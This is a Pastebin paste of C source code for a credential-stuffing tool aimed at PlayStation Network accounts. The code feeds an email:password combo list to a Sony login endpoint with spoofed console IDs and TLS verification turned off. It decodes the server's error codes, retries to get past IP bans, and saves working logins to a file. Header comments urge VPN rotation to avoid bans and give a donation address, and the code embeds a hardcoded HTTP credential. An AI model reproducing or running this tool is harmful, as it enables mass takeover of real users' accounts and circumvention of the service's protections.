Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //CURRENTLY NEEDS HMA V2 VPN ON A ROTATION OF 3 MIN//
- //SONY FUK WHO?????//
- //CLEAN YOUR SHIT UP SONY, WE PAY FOR PS PLUS, SEPERATE THE PS4 PLATFORM, MAKE IT SECURE!!!!!//
- //I GUESS THIS IS THE ONLY WAY YOU WILL LEARN//
- //PLS ADD 64 CID IN THE POOL BELOW, MORE THE BETTER and change idps_pool count//
- //the safest way isto not use multithreading but do so if you wish and kill cid quicker.//
- //--btc-- 18QekFeJx1cE5KGXssDSwCY51TPBngNtUC ----//
- // this is the *no cid method* also no captcha
- #include <stdio.h>
- #include <curl/curl.h>
- #include <stdlib.h>
- #include <string.h>
- #include <inttypes.h>
- #include <time.h>
- #define idps_pool 64
- uint8_t *output_buf=NULL;
- uint64_t outputs=0;
- struct meminfo {
- char *addr;
- int size;
- } memory;
- struct Proxy {
- char proxy[150];
- int size;
- } prox;
- static size_t WriteMemoryCallback(void *contents, size_t size, size_t nmemb, struct meminfo *info)
- {
- size_t realsize = size * nmemb;
- /* if(output_buf==NULL)
- output_buf=malloc(10*1024*1024);
- // printf("%d\n", realsize);
- //0x011d0004==ip ban/idps ban(timeout?)
- //0x01140004==wrong pass/email
- //0x01540d0a==wrong idps/idps ban
- //0x01640004==account guarded
- //0x01020004==account guarded too
- //0x01580004==registered in another place but not here
- if(realsize>4)
- {
- memset(output_buf, 0, 10*1024*1024);
- memcpy(output_buf, contents, realsize);
- char filename[129];
- memset(filename, 0, 129);
- sprintf(filename, "%"PRIu64 , outputs);
- FILE *fp=fopen(filename, "wb");
- fwrite(contents, realsize,1,fp);
- fclose(fp);
- outputs++;
- }*/
- memcpy(info->addr, contents, realsize);
- info->size=realsize;
- return realsize;
- }
- int read_proxies(char *filename, struct Proxy *proxies)
- {
- FILE *fp=fopen(filename, "r");
- if(!fp)
- {
- char dumb[5];
- printf("proxies not found!");
- scanf("%s", &dumb);
- exit(0);
- }
- char str1[150];
- int i=0;
- while (fgets(proxies[i].proxy,150, fp))
- {
- // strcpy(*proxies[i], str1);
- // proxies[i]=str1;
- char *pos;
- if ((pos=strchr(proxies[i].proxy, '\r')) != NULL)
- *pos = '\0';
- if ((pos=strchr(proxies[i].proxy, '\n')) != NULL)
- *pos = '\0';
- i++;
- }
- return i;
- } //use this when you add threading support
- int main(int argc, char **argv)
- {
- CURL *curl;
- CURLcode res;
- /* In windows, this will init the winsock stuff */
- curl_global_init(CURL_GLOBAL_ALL);
- // struct Proxy *proxies=(struct Proxy *)malloc(155*50000);
- // int proxies_loaded=read_proxies(argv[2], proxies);
- int count=0;
- FILE *combos=fopen(argv[1], "r");
- if(!combos)
- {
- char dumb[1];
- printf("file not found!\n");
- scanf("%s", &dumb);
- return -1;
- }
- FILE *output=fopen("accounts.txt", "w");
- char str1[150]={0};
- char post[0x2000]={0};
- char idps[idps_pool*32+1]={""}; //put idps pool
- struct curl_slist *chunk;
- curl = curl_easy_init();
- struct meminfo mem;
- mem.addr=(char *)malloc(1*1024*1024);
- int strsize=0;
- char wrong_email_pass[4]={0x01, 0x14, 0x00, 0x04};
- char account_guard[4]={0x01,0x64,0x00,0x04};
- char account_guard2[4]={0x01,0x02,0x00,0x04};
- char idps_ban[4]={0x01,0x54,0x0d,0x0a};
- char reg_diff_place[4]={0x01,0x58,0x00,0x04};
- int current_pos=0;
- int secret=0, secret2=0;;
- char email[150];
- char pass[150];
- char socks5[200];
- char each_round[20]={0};
- while (fgets(str1,150, combos))
- {
- memset(socks5,0,200);
- printf("%s\n", str1);
- srand(time(NULL));
- secret=rand() % idps_pool;
- // secret2=rand() % proxies_loaded;
- //sprintf(socks5, "socks5://%s", proxies[secret2].proxy);
- strsize=strlen(str1);
- memset(mem.addr, 0, 1*1024*1024);
- mem.size=0;
- memset(email, 0, 150);
- memset(pass, 0, 150);
- memcpy(email, str1, strchr(str1,':')-str1);
- strcpy(pass, strrchr(str1, ':')+1);
- if(!pass)
- continue;
- // *(pass-1)=0x00;
- char *pos;
- if ((pos=strchr(pass, '\r')) != NULL)
- *pos = '\0'; //line break windows
- // *(pos+1)= '\0';
- /* get a curl handle */
- if(curl) {
- chunk = NULL;
- /* Remove a header curl would otherwise add by itself */
- chunk = curl_slist_append(chunk, "X-MediaInformation: PS3/1920x1080");
- /* set our custom set of headers */
- res = curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk);
- curl_easy_setopt(curl, CURLOPT_URL, "https://native.np.ac.playstation.net/native/store/crSess.action");
- // curl_easy_setopt(curl, CURLOPT_PROXY, socks5);
- curl_easy_setopt(curl, CURLOPT_USERPWD, "final:MrD9KuTQ");
- // curl_easy_setopt(curl, CURLOPT_COOKIEJAR, "cookies.txt");
- // curl_easy_setopt(curl, CURLOPT_USERAGENT, " PS3Application libhttp/4.3.1-000 (CellOS)");
- /* Now specify the POST data */
- //memset(post,0, 0x2000);
- sprintf(post, "version=8&username=%s&password=%s&consoleId=%.32s00000000000000000000000000000000", email, pass, idps+(secret*32));
- // fflush(stdout);
- curl_easy_setopt(curl, CURLOPT_POSTFIELDS, post);
- curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);
- curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- curl_easy_setopt(curl, CURLOPT_WRITEDATA, &mem);
- curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 10L);
- curl_easy_setopt(curl, CURLOPT_TIMEOUT, 15L);
- /* Perform the request, res will get the return code */
- printf("%s\n", post);
- res = curl_easy_perform(curl);
- long http_code=0;
- curl_easy_getinfo (curl, CURLINFO_RESPONSE_CODE, &http_code);
- // printf("%d\n", http_code);
- /* Check for errors */
- if((res != CURLE_OK) || (http_code!=200))
- {
- fprintf(stderr, "curl_easy_perform() failed: %s\n",
- curl_easy_strerror(res));
- current_pos=ftell(combos);
- current_pos=current_pos-strsize;
- fseek(combos, current_pos, SEEK_SET); //retry combo
- continue;
- }
- if(strstr(mem.addr, "html"))
- {
- current_pos=ftell(combos);
- current_pos=current_pos-strsize;
- fseek(combos, current_pos, SEEK_SET); //retry combo cause ip ban
- continue;
- }
- /* //DEBUG
- if(res==CURLE_OK) { sprintf(each_round, "%d", count);
- FILE *test=fopen(each_round,"wb");
- fwrite(mem.addr, mem.size,1,test);
- fclose(test);
- return 0;
- }*/
- // printf("mem.size:%d\n", mem.size);
- if(mem.size==4) {
- if((memcmp(mem.addr, wrong_email_pass, 4)) && (memcmp(mem.addr, account_guard, 4)) && (memcmp(mem.addr, account_guard2, 4)) && (memcmp(mem.addr, idps_ban, 4)) && (memcmp(mem.addr, reg_diff_place, 4)))
- {
- current_pos=ftell(combos);
- current_pos=current_pos-strsize;
- fseek(combos, current_pos, SEEK_SET); //retry combo if error other than wrong email/pass
- continue;
- }
- }
- else if(mem.size==0)
- {
- current_pos=ftell(combos);
- current_pos=current_pos-strsize;
- fseek(combos, current_pos, SEEK_SET); //retry combo if return buffer is 0
- continue;
- }
- else if(!strstr(mem.addr, "html"))
- {
- // sprintf(each_round, "%d", count);
- // FILE *test=fopen(each_round,"wb");
- // fwrite(mem.addr, mem.size,1,test);
- // fclose(test); //debug exception
- int ret=fwrite(str1, strlen(str1), 1, output); //dump combo
- fclose(output);
- output=fopen("accounts.txt", "a+");
- if(ret)
- {
- // char dumb2[5];
- printf("combo:%s\n", str1);
- // scanf("%s", &dumb2);
- }
- }
- /* always cleanup */
- }
- curl_easy_reset(curl);
- memset(str1,0,150);
- count++;
- }
- curl_easy_cleanup(curl);
- curl_global_cleanup();
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement